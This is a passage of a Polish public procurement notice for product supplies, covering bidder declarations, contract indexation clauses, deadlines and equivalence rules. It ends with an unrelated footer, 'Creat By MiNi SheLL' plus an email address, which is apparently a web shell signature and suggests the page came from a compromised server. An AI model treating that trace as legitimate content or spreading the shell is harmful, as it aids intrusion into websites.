zamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy, potwierdzające, że nie otwarto jego<br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>3) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy, w<br/>zakresie spełniania warunków udziału w Postępowaniu oraz podstaw wykluczenia z Postępowania wskazanych przez<br/>Zamawiającego, o których mowa w art. 109 ust. 1 pkt 5), 7) Ustawy (zgodnie z treścią Załącznika nr 4a do SWZ).<br/>4) oświadczenia Wykonawcy o braku podstaw wykluczenia z Postępowania<br/>wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2025 r., poz. 514 z późn. zm.) zgodnie z treścią<br/>Załącznika nr 4a do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Części nr 1 – nr 2 - dokument składany na wezwanie Zamawiającego] Wykazu zamówień wykonanych w okresie ostatnich trzech lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, spełniających warunek<br/>określony w Rozdziale IX ust. 2) SWZ (zgodnie z treścią Załącznika nr 5 do SWZ).<br/>Do każdego zamówienia wymienionego w wykazie należy podać: przedmiot, wartość, daty i miejsce wykonania (dd/mm/rrrr) oraz<br/>podmioty, na rzecz których dostawy zostały wykonane, oraz załączyć dowody określające czy te dostawy zostały wykonane<br/>należycie.<br/>Jednocześnie Zamawiający wskazuje, iż dowodami, o których mowa powyżej są:<br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane,<br/>b) jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>Jeżeli Wykonawca powołuje sią na doświadczenie w realizacji dostaw, wykonanych wspólnie z innymi Wykonawcami, wykaz dotyczy<br/>dostaw, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty składanej za pomocą Platformy e-Zamówienia należy dołączyć Formularz asortymentowo - cenowy (Załączniki nr 1.1 – nr 1.2 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie Zamówienia wymóg złożenia<br/>dokumentów, o których mowa w Rozdziale XI ust. 1 i 2 pkt 1) - pkt 4) SWZ dotyczy każdego z Wykonawców.<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału (dotyczy Części nr 1 – nr 2) w Postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego Zamówienia, lub jego części, polegać na zdolnościach<br/>zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>Zamówienia (zgodnie z treścią Załącznika nr 6 do SWZ) lub inny środek dowodowy potwierdzający, że Wykonawca<br/>realizując Zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca jest zobowiązany wykazać<br/>Zamawiającemu, iż ww. zobowiązanie zostało podpisane przez osobę lub osoby uprawione do reprezentacji tego podmiotu.<br/>4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XI ust. 19 SWZ, potwierdza, że stosunek<br/>łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu Zamówienia.<br/>5. Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w art. 118 Ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Rozdziale XI ust. 2 pkt<br/>2) - 4) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany Umowy i waloryzacja<br/>1. Strony dopuszczają zmianę postanowień Umowy w przypadku wystąpienia zmian:<br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego;<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalanej na podstawie<br/>właściwych przepisów;<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub ubezpieczenie zdrowotne;<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych (PPK);<br/>- jeżeli zmiany te mają wpływ na koszty wykonania Umowy przez Wykonawcę (co może polegać zarówno na zwiększeniu lub zmniejszeniu tych kosztów w odniesieniu do cen jednostkowych), każda ze Stron ma prawo zgłoszenia tego faktu drugiej<br/>Stronie Umowy, wraz z ewentualnymi dowodami na poparcie wpływu w/w zmian na koszty Wykonawcy. Jeżeli taki wpływ<br/>zostanie należycie wykazany, Strony niezwłocznie zawrą stosowny aneks do Umowy w przedmiocie zmiany wynagrodzenia<br/>Wykonawcy (ceny jednostkowej) przy uwzględnieniu w/w zmian.<br/>2. Zmiana wysokości cen jednostkowych, a w konsekwencji maksymalnego wynagrodzenia w przypadku zaistnienia<br/>przesłanki, której mowa w ust. 1 pkt 1) będzie odnosić się wyłącznie do części przedmiotu Umowy niezrealizowanej, po dniu<br/>wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług lub podatku akcyzowego oraz wyłącznie do<br/>części przedmiotu Umowy, do której zastosowanie znajduje zmiana stawki podatku od towarów i usług lub podatku<br/>akcyzowego.<br/>3. Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w ust. 1 pkt 2) - 4) będzie<br/>obejmować wyłącznie część wynagrodzenia, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania<br/>Umowy przez Wykonawcę w związku z wejściem w życie przepisów odpowiednio zmieniających wysokość minimalnego<br/>wynagrodzenia za pracę albo minimalnej stawki godzinowej lub dokonujących zmian w zakresie zasad podlegania<br/>ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości stawki składki na ubezpieczenia<br/>społeczne lub zdrowotne lub zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych (PPK).<br/>4. W przypadku zmiany, o której mowa w ust. 1 pkt 2) ceny jednostkowe, a w konsekwencji wynagrodzenie Wykonawcy<br/>ulegnie zmianie o kwotę odpowiadającą wzrostowi kosztu Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń<br/>pracowników świadczących usługi do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę lub<br/>minimalnej stawki godzinowej.<br/>5. W przypadku zmiany, o której mowa w ust. 1 pkt 3) i 4), ceny jednostkowe, a w konsekwencji wynagrodzenie Wykonawcy<br/>ulegnie zmianie o kwotę odpowiadającą zmianie kosztu Wykonawcy ponoszonego w związku z wypłatą wynagrodzenia<br/>pracownikom realizującym zamówienie.<br/>6. W celu zawarcia aneksu Wykonawca powinien wystąpić z wnioskiem o dokonanie zmiany wysokości cen jednostkowych<br/>a w konsekwencji wynagrodzenia, wraz z uzasadnieniem zawierającym w szczególności wyliczenie całkowitej kwoty, o jaką<br/>wynagrodzenie Wykonawcy powinno ulec zmianie oraz wskazaniem daty, od której nastąpiła bądź nastąpi zmiana<br/>wysokości kosztów wykonania Umowy uzasadniająca zmianę wysokości wynagrodzenia należnego Wykonawcy.<br/>Ze względu na brak miejsca w tej sekcji Ogłoszenia, Zamawiający informuje, że wszystkie informacje w temacie zmian<br/>umowy opisano w paragrafie 7<br/>Załącznika nr 2 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-18 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1 W przypadku gdy Wykonawca oferuje produkty równoważne w stosunku do opisanych w Formularzu asortymentowo –<br/>cenowym (Załącznik nr 1.1 nr 1.2. do SWZ), muszą one posiadać parametry techniczne (wielkość opakowania i jego<br/>rodzaj, konsystencja i skład surowcowy produktu itp.) odpowiadające wyszczególnionym produktom w Załączniku nr 1.1. –<br/>1.2 do SWZ, a także posiadać cechy jakościowe (normy polskie) równoważne do produktów wymienionych przez<br/>Zamawiającego poprzez wskazanie ich znaków towarowych.<br/>2. Wykonawca, który powoła się na zastosowanie produktów równoważnych w stosunku do opisywanych w SWZ, jest<br/>obowiązany wykazać, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego w zakresie<br/>opisanym powyżej, składając w tym celu pisemne potwierdzenie równoważności (stosowny wzór oświadczenia znajduje się<br/>w Formularzach asortymentowo – cenowych, stanowiących Załączniki nr 1.1 nr 1.2. do SWZ), Pod pojęciem produktu<br/>równoważnego Zamawiający rozumie produkty o nie gorszych parametrach<br/>jakościowych, posiadające te same walory oraz zawierające w swoim składzie te same surowce użyte do produkcji, co<br/>artykuły określone przez Zamawiającego.<br/>3. W przypadku stwierdzenia w trakcie realizacji umowy, że parametry, jakość lub niezawodność dostarczonych przez<br/>Wykonawcę produktów równoważnych odbiega na niekorzyść od parametrów, jakości i niezawodności produktu<br/>oryginalnego, wówczas Zamawiający będzie żądał od Wykonawcy wymiany produktu na inny, spełniający wymagania.<br/>4. Zamawiający wymaga, aby zaoferowane produkty były powszechnie dostępne w obrocie towarowym.<br/>5. Dostawy odbywać się będą zgodnie ze składanym zamówieniem przez Placówki wymienione Rozdziale III SWZ.<br/>6. Wielkość i asortyment dostaw będą uzależnione od bieżących potrzeb Placówek.<br/>7. Podane ilości produktów mają charakter szacunkowy i mogą ulec zmianie (zwiększyć lub zmniejszyć się). Każdej<br/>Placówce przysługuje prawo wyboru ilości zamawianego asortymentu w granicach określonych wartością brutto umowy dla<br/>poszczególnej Placówki.<br/>8. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie z tytułu niewykorzystania ilościowego umowy oraz niewykorzystania całej wartości umowy. Niewykorzystanie przez Zamawiającego całego zakresu przedmiotu umowy nie wymaga podania przyczyn oraz nie powoduje po stronie Wykonawcy zobowiązań odszkodowawczych z tego tytułu.<br/>Gwarantowany przez Zamawiającego zakres dostaw nie będzie mniejszy niż 70% kwoty brutto, określonej w § 2 ust. 2.<br/>umowy.<br/>9. Zamawiający podkreśla, że ilości wykazane w Formularzu asortymentowo – cenowym są jedynie ilościami szacunkowymi.<br/>10. Każda dostawa winna zawierać wszystkie zamówione artykuły. Zamawiający nie wyraża zgody na dzielenie zamówionej<br/>dostawy na części.<br/>11. Nazwy własne podane w Formularzu asortymentowo - cenowym, który stanowi Załącznik nr 1.1 – nr 1.2 do SWZ należy rozumieć jako preferowanego typu. Wykonawca może zaproponować produkty o innej nazwie, jednak muszą one spełniać wymogi tej samej lub wyższej jakości. Producent lub nazwa lub marka takiego produktu musi znaleźć się w treści oferty.<br/>12. Dowóz towaru nastąpi na koszt i ryzyko Wykonawcy, ubezpieczonym transportem, do stosownej placówki Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com